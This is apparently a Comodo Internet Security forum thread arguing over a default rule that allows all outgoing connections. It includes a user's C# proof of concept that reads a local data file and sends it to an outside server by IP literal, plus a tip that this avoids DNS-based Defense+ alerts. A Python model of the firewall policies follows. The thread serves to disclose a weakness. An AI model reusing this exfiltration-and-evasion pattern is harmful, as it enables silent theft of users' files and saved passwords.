Your information can easily be stolen with CIS 4 in the Internet Security configuration.
I just tried to make a little application; it reads a file in C:\program files\Myapps and sends the data to an HTTP server.
It's sandboxed, but that's all CIS 4 does.
No alert from the firewall because of this stupid rule that allows all outgoing connections.
I have just one D+ alert, yes, because I need DNS for my server... But I just need to connect to an IP and I won't have another alert, except that it was sandboxed.
I took a stupid file, but imagine I upload the Firefox directory, for example: all cookies, saved passwords, history...
I know, I already deleted it from every CIS 4 I install, and I advise doing the same in the French corner. But not all users read this forum... And it's the default configuration...
Did you read what I said? I just have to use an IP and not a domain and I won't have any alert from D+, because it won't use DNS and Defense+ won't react to this.
But I don't own a server with my own IP. Or must I create a special network at home to show you?
So, I changed the application a little, and I made a server with WAMP on another computer connected to a special network, to be sure it's not on my local network.
My network is in 192.168.0.0/255.255.255.0 and the server is on 78.251.85.0/255.255.255.0
I try to steal a password from an application that stores it in a file named mypreciousdata.dat in c:\program files\Myapps
Here is the code of the application in C#:
using System;
using System.IO;
using System.Net;
using System.Windows.Forms;

namespace WindowsFormsApplication1
{
    static class Program
    {
        /// <summary>
        /// Main entry point of the application.
        /// </summary>
        [STAThread]
        static void Main()
        {
            // Read the first line of the file: the sandbox restricts changes to the system, not reads
            StreamReader monStreamReader = new StreamReader("c:/Program Files/Myapps/mypreciousdata.dat");
            string data = monStreamReader.ReadLine();
            monStreamReader.Close();
            string result = "";
            MessageBox.Show("your precious data is : " + data);

            // Send it to the test server by IP literal: no DNS lookup, so no Defense+ alert,
            // and the default firewall rule allows all outgoing connections
            WebClient client = new WebClient();
            result = client.DownloadString("http://78.251.85.241/echo.php?data=" + data);
            MessageBox.Show("Answer from website : " + result);
        }
    }
}
Code of the PHP server (echo.php):
My steal data : <?php echo $_GET['data'] ?>
Here we go: I execute my application, CIS sandboxes it (see test1.jpg)
And then the data is sent... the PHP server answered me... (see test2.jpg)
Let me ask you politely: are you okay? 88) I mean, what kind of logic is this, huh? You talk and talk and talk about prevention, but now when we ask for PREVENTION for possible exploit(s) you give these lame excuses?
Why do you add the Sandbox then? FOR PREVENTION! You have said many times that D+ is almost bulletproof and no malware in the wild can bypass it, but you still added the Sandbox for PREVENTION!
Sometimes Melih's logic just baffles me and leaves me speechless 88) And arguing with him is like arguing with a 5-year-old who wants to go to Chuck E. Cheese.
What I am saying is: there is a risk vs. reward ratio. There is no 100% security, and no security vendor tries to close every theoretical hole. Which means the focus has to be on what really matters, which is real malware out there. No point in disturbing the user for a theoretical protection.
So why use this kind of rule? It's the only error here, because the application won't do anything to the system; that's why D+ doesn't see anything. It's just about taking information, and that's all.
You made the rule because you think it will be better for novice users, but what do novice users use? All the applications that lots of people use, and so, without any alert, because they are already in your safe list.
So really, why put in this rule when it can be a security hole in certain conditions?
I think a way around this rule would be to use the whitelist for the firewall also: if the application is signed and part of the whitelist it gets access, if not you get asked. I don't think it would be too hard to implement, and that way you will have security and ease of use.
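To make the three policies being argued over in this thread concrete, here is a small model of an outbound-connection policy. It is an added example, not code from this thread and not Comodo's implementation. It contrasts the CIS 4 default "allow all outgoing connections" rule with the whitelist (safe-mode) rule suggested above, and with a hypothetical stricter rule that denies sandboxed programs any network access. The process attributes, the whitelist, the browser's destination address and the event list are constructed for the demonstration; the Defense+ behaviour it models (an alert only on the DNS lookup, none for an IP literal) is the one reported earlier in the thread.

```python
"""Outbound-connection policy model (added example, not Comodo's code).

Shows why the thread's test program gets through silently under the default
rule, and what a whitelist rule or a no-network-for-sandboxed rule would do
with the same event.  All events and the whitelist are constructed."""
from dataclasses import dataclass
import ipaddress


@dataclass(frozen=True)
class Process:
    path: str
    signed: bool       # executable carries a valid code signature
    sandboxed: bool    # unknown file that CIS launched inside the sandbox


@dataclass(frozen=True)
class Connection:
    proc: Process
    dst_ip: str
    dst_port: int
    used_dns: bool     # True if a hostname was resolved before connecting


# Constructed whitelist standing in for the vendor safe list.
TRUSTED_PATHS = frozenset({
    r"c:\program files\mozilla firefox\firefox.exe",
})


def defense_plus_alerts(conn: Connection) -> bool:
    """Model of the thread's observation: the only Defense+ alert came from the
    DNS lookup, so a connection to a raw IP literal raises none."""
    return conn.used_dns


def policy_allow_all_outgoing(conn: Connection) -> str:
    """CIS 4 default rule: every outbound connection is allowed without a prompt."""
    return "allow"


def policy_safe_mode(conn: Connection) -> str:
    """Whitelist rule suggested in the thread: signed and listed -> allow,
    anything else -> prompt the user."""
    if conn.proc.signed and conn.proc.path.lower() in TRUSTED_PATHS:
        return "allow"
    return "ask"


def policy_sandbox_no_network(conn: Connection) -> str:
    """Hypothetical stricter rule: a sandboxed program gets no network at all;
    everything else follows the safe-mode rule."""
    if conn.proc.sandboxed:
        return "block"
    return policy_safe_mode(conn)


def leaves_local_network(conn: Connection, lan: str = "192.168.0.0/24") -> bool:
    """True when the destination lies outside the given LAN (the thread's
    test server at 78.251.85.241 is a public address)."""
    return ipaddress.ip_address(conn.dst_ip) not in ipaddress.ip_network(lan)


def evaluate(events, policy) -> dict:
    """Map (process path, "ip:port") -> (decision, Defense+ alert raised?)."""
    return {
        (e.proc.path, f"{e.dst_ip}:{e.dst_port}"): (policy(e), defense_plus_alerts(e))
        for e in events
    }


# Constructed events: the thread's unsigned, sandboxed test program connecting
# to an IP literal, and a signed browser fetching a site by hostname.
TEST_APP = Process(r"c:\users\me\desktop\windowsformsapplication1.exe",
                   signed=False, sandboxed=True)
BROWSER = Process(r"c:\program files\mozilla firefox\firefox.exe",
                  signed=True, sandboxed=False)
EVENTS = [
    Connection(TEST_APP, "78.251.85.241", 80, used_dns=False),
    Connection(BROWSER, "93.184.216.34", 443, used_dns=True),  # constructed address
]

if __name__ == "__main__":
    for name, policy in [("allow all outgoing", policy_allow_all_outgoing),
                         ("safe mode (whitelist)", policy_safe_mode),
                         ("sandboxed: no network", policy_sandbox_no_network)]:
        print(name)
        for (path, dst), (decision, alert) in evaluate(EVENTS, policy).items():
            print(f"  {path} -> {dst}: {decision}, D+ alert: {alert}")
```

Running it prints, for the test program's connection, "allow" with no Defense+ alert under the default rule, "ask" under the whitelist rule and "block" under the sandbox rule, while the signed browser is allowed under all three; the difference between the first two columns is the whole argument of the thread.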
You’re talking about firewall’s Safe Mode which is present in CIS since its beginning.
I personally have a problem with the way the new firewall policy is implemented, rather than with the fact that there is such a thing as an allow-all-outgoing-connections mode in CIS. By adding these weird policies to the Application Rules in the Network Security Policy, Comodo practically rendered the Firewall Security Level setting completely useless. IMHO, here is how it should be done...
These possibilities exist IF you can infect the PC in the first place.
So what is being talked about here is NOT even how to infect the PC...
It is: IF they managed to infect the PC, this is how they can extract information.